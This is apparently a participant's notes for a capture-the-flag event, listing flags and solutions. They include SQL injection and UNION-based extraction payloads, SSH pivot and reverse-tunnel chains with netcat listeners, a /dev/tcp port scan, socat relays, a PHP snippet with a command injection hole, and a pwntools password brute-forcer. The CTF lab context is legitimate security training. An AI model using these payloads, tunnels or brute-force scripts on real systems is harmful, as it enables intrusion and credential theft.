
NOTES_CTF_bishopfox_talentrepublic_12.txt

Jun 15th, 2021 (edited)
  1. /*
  2. https://lucha-de-zorros.bishopfox.com/
  3. https://twitter.com/todmephis/status/1402659976867467272
  4. */
  5.  
  6. proxychains ssh level11@167.71.187.239
  7.  
  8. 1-> 4202c26842398c1d0772ed9eed195113
  9. 2-> 943430e07fd566bc96aa05fca3c96e48
  10. 3-> 2cadca6148093c403d82396252b8c4db
  11. 4-> 72f6af6b0005adb15fbc91e1b140115f
  12. 5-> 7b6c2552940f47a27fbd729ae0e2893c
  13. 6-> 7cb1963d316b9a302cf6c204d35b7302
  14. 7-> RG8geW91IGV2ZW4gbGlmdCBicm8g
  15. 8-> bGV0J3MgZmluZCBzb21ldGhpbmcg
  16. 9-> 96ab15e954f1267ea04c35de2d771c2b
  17. 10 -> 955830
  18. 11-> 192
  19. 12 -> 0982e2a869857644074d06b1a4fd1bea
  20. 13 -> f4736e1eb28b1d9055c5f5d58a49b5a6
  21. 14 -> 0ea027e3835aa87a4a47465321c5fe75
  22. 15 -> 4.19
  23. 16 -> Debian
  24. 17 -> 6b39034a8045ed996a436f8d09031522
  25. 18 -> 9a42b1822710d790a393800f2896a8f7
  26. 19 -> b06a246b0646b337f319316b9232151c
  27. 20 -> 5cf82d972614f73422f899f90cfce80f
  28. 21 -> 65230da2ead4ba2ed76ee2605cadcd4d
  29.  
  30. traceeasy -> ts{whydidyouevenrunit}
  31.  
  32. tigers -> TS{JoeMadeAllTheseTaligers}
  33. web recon1 -> TS{CaroleBaskinTotallyDidIt}
  34. web recon2 -> TS{JeffLoweStoleAllMyTigers}
  35.  
  36. CANDY -> TS{PeopleComeToSeeMeNotTheTigers}
  37.  
  38. OLD IE BROWSER -> TS{ThisBrowserIsPerferctForWatchingJoeExoticTV}
  39.  
  40. admin section -> ' or 1=1 -- > TS{JoeIsGladYouCameToSeeAllHisTigers}
  41.  
  42. search tiges -> -1' or 1=1 /* > TS{LookingForTigerIsDarnHard}
  43.  
  44. what is joe's password? -> tigers
  45.  
  46. clicks ->ts{bufferoverflow}
  47. /*
  48.  
  49. ts buff { ow ov ag } fl er
  50.  
  51. ts{bufferoverflag}
  52. */
  53.  
  54. Perime -> ssh tunneler@tunneler.threatsims.com -p 2222 -L 8000:IP:80 -> ts{SSHtoANonStandardPort}
  55.  
  56. Access the web -> ts{TheFirstTunnelIsTheEasiest}
  57.  
  58. PIVOT -> proxychains ssh -J tunneler@tunneler.threatsims.com:2222 whistler@10.218.176.199 -> ts{IThoughtWeLostYouOnTheWay}
  59.  
  60. PIVOT2 -> proxychains ssh -J tunneler@tunneler.threatsims.com:2222,whistler@10.218.176.199:22 crease@10.112.3.12 -> ts{TunnelsInTunnelsInTunnels}
  61.  
  62. BEACONS 1 -> proxychains ssh -J tunneler@tunneler.threatsims.com:2222 whistler@10.218.176.199 -R 10.112.3.199:58671:127.0.0.1:5999 -> nc -lvnp 5999 -> ts{GreatFirstReverseTunnel}
  63.  
  64.  
  65. BEACONS 2 -> proxychains ssh -J tunneler@tunneler.threatsims.com:2222 whistler@10.218.176.199 -L 127.0.0.1:7000:10.112.3.88:7000 -> fast -> nc -lvnp 5555 -> ts{YourTunnelGameisAlright}
  66.  
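# Reverse-tunnel helper for the BEACONS 2 step: hop through tunneler (sshd on
# 2222) to whistler and ask whistler's sshd to listen on 10.112.3.199:<port>,
# forwarding every inbound connection back to 127.0.0.1:5555 on this host
# (where the `nc -lvnp 5555` listener from the note above is waiting).
# Usage: fast <remote-port>
# Caveat: -R with a non-loopback bind address (10.112.3.199, presumably
# whistler's own interface on the 10.112.3.0/24 segment) is honoured only if
# whistler's sshd has GatewayPorts set to yes/clientspecified; otherwise sshd
# silently binds loopback and the beacon never reaches the listener.
fast(){
    if [ -z "$1" ]; then
        echo "usage: fast <remote-port>" >&2
        return 1
    fi
    ssh -J tunneler@tunneler.threatsims.com:2222 whistler@10.218.176.199 \
        -R "10.112.3.199:$1:127.0.0.1:5555"
}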
  70.  
  71.  
  72.  
  73. Network scan -> for port in {1..65535}; do echo >/dev/tcp/10.112.3.207/$port && echo "port $port is open"; done > test.txt -> ftp 10.112.3.207 53121 -> ts{SocatTunnelsForTheWin}   (caveat: bash's /dev/tcp connect has no timeout, so a filtered port stalls the loop; wrap each probe in `timeout 1 bash -c '...'` if the scan hangs. Refused ports only print an error on stderr, so test.txt ends up holding just the open ones.)
  74.  
  75. SNMP -> pivot2(crease) socat tcp-listen:6666,fork udp4:10.24.13.161:161 -> pivot1 (whistler) proxychains ssh -J tunneler@tunneler.threatsims.com:2222 whistler@10.218.176.199 -L 6666:10.112.3.12:6666 -> LOCALHOST socat UDP4-LISTEN:161,fork TCP:localhost:6666 -> LOCAL snmpwalk -v1 -c public localhost -> ts{UDPthroughTCPtunnels}
  76.  
  77. WEB2 -> pivot2(crease) socat tcp-listen:6666,fork tcp6:[2a02:1b8:b010:9010:1::86]:80 -> proxychains ssh -J tunneler@tunneler.threatsims.com:2222 whistler@10.218.176.199 -L 6666:10.112.3.12:6666 -> curl 127.0.0.1:6666 -> ts{IPv6isNotActuallyNew}
  78.  
  79. REPORT1 -> TPS-8352 //XD TPS-31337
  80. REPORT2 -> TS{GetThemTPSReports}
  81.  
  82.  
  83. TheFlagforthischallengeis:ts{IreallymissThePongs}
  84. elgoticalnest{ralmsTeog}hFafrhshlegi:sIelyishPnsT
  85.  
  86.  
  87. view-source:http://troll.threatsims.com:4646//lel.php.back
  88.  
<?php
// Challenge source recovered from the exposed backup (lel.php.back) on
// troll.threatsims.com:4646 -- kept verbatim, it is the target of the exploit.
// Working directory for whatever the command below touches; the leading '@'
// suppresses the warning if /tmp/bf does not exist.
@chdir('/tmp/bf');
// Sink: the GET parameter is base64-decoded and spliced, unescaped, into a
// shell command line executed by exec() -> OS command injection. Only the
// *encoded* length is checked (<= 8 chars, i.e. at most 6 decoded bytes), so a
// short metacharacter payload (e.g. `;id`, 3 bytes) still reaches the shell.
// exec()'s return value is discarded and nothing is echoed back, so any result
// has to be observed out-of-band (timing, outbound connection, file in /tmp/bf).
if (isset($_GET['DL2k21']) && strlen($_GET['DL2k21']) <= 8) {
@exec('echo -n '.base64_decode($_GET['DL2k21']));
}

// That was easy! Now you have the code that runs in the server; congratz.

// Watch out: There's something else, evil, being executed...

?>
  100.  
  101.  
  102.  
  103.  
  104.  
  105.  
  106.  
  107. 22->643b2616b33de99b179c33950970d519
  108.  
  109.  
  110. -1' or age < 60 /*
  111. -1' or 1=1 order by 4 /*
  112.  
  113. -1' or 1=1 union all select (SELECT name FROM sqlite_master WHERE type ='table' AND name NOT LIKE 'sqlite_%' limit 1)as t,2,3,4 /*
  114. -1' or 1=1 union all select (SELECT name FROM sqlite_master WHERE type ='table' AND name NOT LIKE 'sqlite_%' limit 1,2)as t,2,3,4 /*
  115. -1' or 1=1 union all select (SELECT typeof(password) from user limit 1)as t,2,3,4 /*
  116.  
  117. -1' or 1=1 union all select (SELECT password>=25 from user limit 1)as t,2,3,4 /*
  118. -1' or 1=1 union all select (SELECT password>=25 from user limit 1)as t,2,3,4 /*
  119.  
  120. -1' or 1=1 union all select (SELECT sql FROM sqlite_master WHERE name = 'user';)as t,2,3,4 /*   <- fails: the stray ';' inside the subquery is a syntax error; the working form is the next payload (with "limit 1")
  121.  
  122. -1' or 1=1 union all select (SELECT sql FROM sqlite_master WHERE name = 'user' limit 1)as t,2,3,4 /*
  123.  
  124. ####ping.py
from pwn import *

# Connection to the "pong" challenge service. The protocol, as far as this
# script exercises it: the client sends a line, the server replies with text,
# and the stripped replies are concatenated into the flag (see loop() below).
# NOTE(review): r.recv() returns whatever has arrived so far, not a full line,
# so a slow server could split one reply across two reads.
r = remote("pong.threatsims.com", 2345)

# First answer the service expects from the client.
correct = "T"

r.recv()                 # discard the initial banner/prompt
r.sendline(correct)

# The first reply, minus line endings, seeds the flag.
c = r.recv().decode().replace('\n', '').replace('\r', '')
flag = c
  132.  
def loop(c):
    """Play two rounds of the echo game and return the text of the last round.

    Each round reads what the server has sent, strips CR/LF, and sends that
    text straight back. ``c`` is accepted for call-site compatibility but is
    not used. Relies on the module-level connection ``r``.

    Raises EOFError (pwntools) once the server closes the connection.
    """
    last = ""
    for _ in range(2):
        last = r.recv().decode().replace('\n', '').replace('\r', '')
        r.sendline(last)
    return last
  139.  
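# Keep playing until the server hangs up; every round's reply extends the flag.
# pwntools raises EOFError when the remote side closes the connection, so catch
# it and finish with the flag collected so far instead of a traceback.
try:
    while True:
        c = loop(c)
        flag += c
        print(flag)
except EOFError:
    print('[*] connection closed; flag so far: %s' % flag)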
  144.  
  145.  
  146. #####list1.txt
  147. Ron
  148. Livingston
  149. Ron
  150. Livingston
  151. ...
  152. Peter
  153. Jennifer
  154. Aniston
  155. Jennifer
  156. Aniston
  157. ...
  158. Joanna
  159. David
  160. Herman
  161. David
  162. Herman
  163. ...
  164. Michael
  165. Bolton
  166. Ajay
  167. Naidu
  168. Ajay
  169. Naidu
  170. ...
  171. Samir
  172. Diedrich
  173. Bader
  174. Diedrich
  175. Bader
  176. ...
  177. Lawrence
  178. Stephen
  179. Root
  180. Stephen
  181. Root
  182. ...
  183. Milton
  184. Gary
  185. Cole
  186. Gary
  187. Cole
  188. ...
  189. Bill
  190. Lumbergh
  191. Richard
  192. Riehle
  193. Richard
  194. Riehle
  195. ...
  196. Tom
  197. Smykowski
  198. Alexandra
  199. Wentworth
  200. Alexandra
  201. Wentworth
  202. ...
  203. Anne
  204. Joe
  205. Bays
  206. Joe
  207. Bays
  208. ...
  209. Dom
  210. Portwood
  211. John
  212. C.
  213. McGinley
  214. John
  215. C.
  216. McGinley
  217. ...
  218. Bob
  219. Slydell
  220. Paul
  221. Willson
  222. Paul
  223. Willson
  224. ...
  225. Bob
  226. Porter
  227. Kinna
  228. McInroe
  229. Kinna
  230. McInroe
  231. ...
  232. Nina
  233. Todd
  234. Duffey
  235. Todd
  236. Duffey
  237. ...
  238. Chotchkie's
  239. Waiter
  240. Greg
  241. Pitts
  242. Greg
  243. Pitts
  244. ...
  245. Drew
  246. Michael
  247. McShane
  248. Michael
  249. McShane
  250. ...
  251. Dr.
  252. Swanson
  253. (as
  254. Micheal
  255. McShane)
  256. Linda
  257. Wakeman
  258. Linda
  259. Wakeman
  260. ...
  261. Laura
  262. Smykowski
  263. Jennifer
  264. Jane
  265. Emerson
  266. Jennifer
  267. Jane
  268. Emerson
  269. ...
  270. Female
  271. Temp
  272. Kyle
  273. Scott
  274. Jackson
  275. Kyle
  276. Scott
  277. Jackson
  278. ...
  279. Rob
  280. Newhouse
  281. Orlando
  282. Jones
  283. Orlando
  284. Jones
  285. ...
  286. Steve
  287. Barbara
  288. George-Reiss
  289. Barbara
  290. George-Reiss
  291. ...
  292. Lumbergh's
  293. Secretary
  294. Tom
  295. Schuster
  296. Tom
  297. Schuster
  298. ...
  299. Construction
  300. Foreman
  301. Rupert
  302. Reyes
  303. Rupert
  304. Reyes
  305. ...
  306. Mexican
  307. Waiter
  308. (as
  309. Ruperto
  310. Reyes
  311. Jr.)
  312. Jackie
  313. Belvin
  314. Jackie
  315. Belvin
  316. ...
  317. Swanson's
  318. Patient
  319. #1
  320. Gabriel
  321. Folse
  322. Gabriel
  323. Folse
  324. ...
  325. Swanson's
  326. Patient
  327. #2
  328. Jesse
  329. De
  330. Luna
  331. Jesse
  332. De
  333. Luna
  334. ...
  335. Cop
  336. at
  337. Fire
  338. Mike
  339. Judge
  340. Mike
  341. Judge
  342. ...
  343. Chotchkie's
  344. Manager
  345. (as
  346. William
  347. King)
  348. Justin
  349. Possenti
  350. Justin
  351. Possenti
  352. ...
  353. Spectator
  354. Jack
  355. Betts
  356. Jack
  357. Betts
  358. ...
  359. Judge
  360. Rest
  361. of
  362. cast
  363. listed
  364. alphabetically:
  365. Charissa
  366. Allen
  367. Charissa
  368. Allen
  369. ...
  370. Jogger
  371. (uncredited)
  372. Josh
  373. Bond
  374. Josh
  375. Bond
  376. ...
  377. Initech
  378. Security
  379. Guard
  380. (uncredited)
  381. Bob
  382. Crain
  383. Bob
  384. Crain
  385. ...
  386. Sleepy
  387. Office
  388. Worker
  389. (uncredited)
  390. Natalie
  391. Denning
  392. Natalie
  393. Denning
  394. ...
  395. Initech
  396. Employee
  397. (uncredited)
  398. Gareth
  399. B.
  400. DePutron
  401. Gareth
  402. B.
  403. DePutron
  404. ...
  405. Office
  406. Worker
  407. (uncredited)
  408. Samantha
  409. Inoue
  410. Harte
  411. Samantha
  412. Inoue
  413. Harte
  414. ...
  415. Initech
  416. Employee
  417. (uncredited)
  418. R.C.
  419. Keene
  420. R.C.
  421. Keene
  422. ...
  423. Rush
  424. Hour
  425. Driver
  426. (uncredited)
  427. Mark
  428. Kubiak
  429. Mark
  430. Kubiak
  431. ...
  432. Initech
  433. Employee
  434. (uncredited)
  435. K.
  436. Todd
  437. Lytle
  438. K.
  439. Todd
  440. Lytle
  441. ...
  442. Rush
  443. Hour
  444. Driver
  445. (uncredited)
  446. David
  447. Sharp
  448. David
  449. Sharp
  450. ...
  451. Rush
  452. Hour
  453. Driver
  454. (uncredited)
  455. Fabian
  456. Watkins
  457. Fabian
  458. Watkins
  459. ...
  460. Pedestrian
  461. (uncredited)
  462. Jared
  463. B.
  464. Wells
  465. Jared
  466. B.
  467. Wells
  468. ...
  469. Driver
  470. in
  471. traffic
  472. (uncredited)
  473. Heath
  474. Young
  475. Heath
  476. Young
  477. ...
  478. Spectator
  479. (uncredited)
  480. Produced
  481. by
  482.  
  483. Mike
  484. Judge
  485. ...
  486. producer
  487. (uncredited)
  488. Daniel
  489. Rappaport
  490. ...
  491. producer
  492. Guy
  493. Riedel
  494. ...
  495. executive
  496. producer
  497. Michael
  498. Rotenberg
  499. ...
  500. producerMusic
  501. by
  502.  
  503. John
  504. Frizzell
  505. Cinematography
  506. by
  507.  
  508. Tim
  509. Suhrstedt
  510. ...
  511. director
  512. of
  513. photographyFilm
  514. Editing
  515. by
  516.  
  517. David
  518. Rennie
  519. Casting
  520. By
  521.  
  522. Nancy
  523. Klopper
  524. Production
  525. Design
  526. by
  527.  
  528. Edward
  529. T.
  530. McAvoy
  531. ...
  532. (as
  533. Edward
  534. McAvoy)Art
  535. Direction
  536. by
  537.  
  538. Adele
  539. Plauche
  540. Set
  541. Decoration
  542. by
  543.  
  544. Carla
  545. Curry
  546. Costume
  547. Design
  548. by
  549.  
  550.  
  551. ####report.py
  552.  
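from pwn import *
import sys   # used by sys.exit below; do not rely on pwn's star-import for it

# Candidate passwords: one token per line of list1.txt (a scraped IMDb cast
# list, one word per line). The dump repeats every name and contains "..."
# filler lines, so drop blanks/"..." and keep only the first occurrence of each
# token -- every wasted guess is another round trip to the service.
with open('list1.txt') as fh:
    words = list(dict.fromkeys(
        w for w in fh.read().replace('\r', '').split('\n')
        if w and w != '...'
    ))

r = remote("tps.threatsims.com", 5000)
r.recv()
r.sendline("1")            # menu choice
d = r.recv()
r.sendline("TPS-8352")     # report id from the REPORT1 step
e = r.recv().decode()
print(e)

for passwd in words:
    print('[+] Trying : %s' % passwd)
    r.sendline(passwd)
    resp = r.recvline()
    if b'Wrong' in resp:
        # Drain the two lines that follow a rejection (presumably the rest of
        # the error text and the re-prompt) before the next guess.
        r.recvline()
        r.recvline()
        continue
    print(str(resp))
    sys.exit('[+] Found! \n%s' % resp)

# Previously the script just fell off the end here; say so explicitly.
sys.exit('[-] Exhausted %d candidates without a match' % len(words))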
  575.  
  576.  
  577.  
  578. wV8E8u7OmgOS0WldXPoHWJDSaAP/gdRJ
  579.  
  580. elgoticalnest{ralmsTeog}
  581. ts{IreeeallymissThhhePongs}
  582. elgoticalnest{ralmsTeog}hFafrhshlegi
  583. elgoticalnest{ralmsTeog}hFafrhshlegi:sIelyishPnsT
  584.  
  585.  
  586.  
  587.  
  588.  
  589.  
  590.  
  591.  
  592.  
  593.  
  594. /*
  595. https://alparslanakyildiz.medium.com/necromancer-ctf-solution-c675a13c8fd8
  596. http://zarb.org/~gc/html/udp-in-ssh-tunneling.html
  597. https://book.hacktricks.xyz/tunneling-and-port-forwarding
  598. https://www.hackingarticles.in/snmp-lab-setup-and-penetration-testing/
  599. https://book.hacktricks.xyz/pentesting/pentesting-snmp
  600. https://rayhan0x01.github.io/ctf/2020/08/08/defcon-redteamvillage-ctf-programming-challenges.html
  601. https://www.sqlitetutorial.net/sqlite-tutorial/sqlite-describe-table/
  602.  
  603. http://zarb.org/~gc/html/udp-in-ssh-tunneling.html
  604. https://github.com/hyperreality/ctf-writeups/blob/master/2020-defcon-redteamvillage/README.md
  605. https://rayhan0x01.github.io/ctf/2020/08/08/defcon-redteamvillage-ctf-programming-challenges.html
  606. https://www.imdb.com/title/tt0151804/fullcredits
  607. https://www.eventbrite.com/e/defcon-red-team-village-ctf-qualifiers-tickets-111543144548
  608. https://blog.ikuamike.io/posts/2020/grayhat_red_team_village_ctf_tunneler_writeup/
  609. https://blog.ikuamike.io/posts/2020/grayhat_red_team_village_ctf_tunneler_writeup/#5-beacons-annoying
  610. https://rayhan0x01.github.io/ctf/2020/08/08/defcon-redteamvillage-ctf-tunneler-1,2,3,4,5,7,9.html
  611. */